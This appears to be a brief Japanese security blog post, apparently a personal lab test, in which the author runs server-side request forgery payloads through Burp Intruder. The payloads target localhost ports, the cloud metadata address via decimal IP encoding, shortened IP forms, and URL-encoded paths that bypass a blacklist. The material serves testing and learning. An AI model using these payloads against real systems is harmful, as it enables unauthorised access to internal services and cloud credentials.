shikata ga nai

Private? There is no such things.

SSRFのペイロードをためしてみた

Hello there, ('ω')ノ

 

SSRFにもたくさんのペイロードがあって。

 

f:id:ThisIsOne:20210216073600p:plain

 

リクエストをIntruderへ。

 

f:id:ThisIsOne:20210216073627p:plain

 

まずは、基本的なペイロードを。

 http://127.0.0.1:80

 http://127.0.0.1:443

 http://127.0.0.1:22

 http://0.0.0.0:80

 http://0.0.0.0:443

 http://0.0.0.0:22

 

f:id:ThisIsOne:20210216073950p:plain

 

結果は、以下のとおりで。

 

f:id:ThisIsOne:20210216074023p:plain

 

次に10進数のIPロケーションを使用してバイパスするペイロードを。

 http://0177.0.0.1/

 http://2130706433/http://127.0.0.1

 http://3232235521/http://192.168.0.1

 http://3232235777/http://192.168.1.1

 http://2852039166/http://169.254.169.254

 

f:id:ThisIsOne:20210216074427p:plain


それから、ゼロを削除してIPアドレスを短縮してバイパスするペイロードを。

 http://0/

 http://127.1

 http://127.0.1

 

f:id:ThisIsOne:20210216074858p:plain

 

さらには、特定のURLをシングルまたはダブルエンコードして。

ブラックリストをバイパスするペイロードを。

 http://127.0.0.1/%61dmin

 http://127.0.0.1/%2561dmin

 

f:id:ThisIsOne:20210216075005p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain